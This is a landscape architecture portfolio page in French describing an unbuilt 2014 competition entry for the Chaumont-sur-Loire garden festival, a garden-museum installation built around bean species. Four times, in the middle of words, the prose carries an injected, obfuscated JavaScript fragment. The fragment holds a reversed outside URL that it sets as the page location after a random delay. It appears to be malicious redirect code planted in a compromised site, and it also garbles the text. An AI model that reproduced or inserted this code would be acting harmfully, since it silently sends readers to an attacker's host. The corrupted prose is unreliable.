FESTIVAL INTERNATIONAL DES JARDINS DE CHAUMONT-SUR-LOIRE – CONCOURS

  • Réalisation

    2014 - non réalisé
  • Lieu

    CHAUMONT SUR LOIRE
  • Maîtrise d'ouvrage

    CHAUMONT SUR LOIRE
  • Maîtrise d'oeuvre

    Paysagistes
    Friche and Cheap avec la collaboration de Julie Ambal



  • Budget

    11 000 € HT

Musée jardiné

Le haricot s’invite sur le domaine de  Chaumont-sur-Loire en véritable objet d’exception. A la fois objet et sujet d’exposition, il s’autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toproclame au travers d’une scénographie muséographique. Une déambulation contemplative s’opère au fil sinueux d’un parcours créé par le continuum interrompu de rideaux luisants. L’écrin précieux du dispositif, entre la brillance immaculée des grands pans textiles et le noir profond du sable au sol, provoque le trouble entre intérieur et extérieur. Comme on découvre successivement des tableaux, on découvre les différentes espèces de haricots qui exposent leurs singularités spécifiques au visiteur : formes, couleurs, fleurs, gousses. Le contraste s’opère au profit de cette collection vivante, végétale et éphémère. L’espace prend une plastique nouvelle et élastique, l’expérience spatiale et corporelle se confronte au dispositif évolutif caractérisé par une lumière, des reflets, des transparences et des hauteurs toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours changeantes. Au gré hasardeux de ses déplacements, le visiteur découvre cette collection singulière dont la qualité se nuance à la fois selon les espèces et les saisons : feuillages, fleurs et gousses aux formes et couleurs diverses.

Le creux des alcôves de l’installation cache quant à lui deux secrets. Un des rideaux se revêt discrètement d’une fresque célébrant la diversité des graines. Une collection photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tographique, exposant la grande richesse plastique des haricots, habillera le pan intérieur de l’alcôve accompagnée d’une cartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tographie des origines de cette plante.

Un peu plus loin, placé sous une cloche de verre, le haricot s’assoie précautionneusement sur un coussin de velours rouge, dressé sur son socle de pierre.  Anonyme et dévêtu, il apparait comme un diamant brut, et se contemple comme un trésor symbolique. Point d’orgue de cette collection, le haricot s’érige en œuvre d’art.

Projet précédent | Projet suivant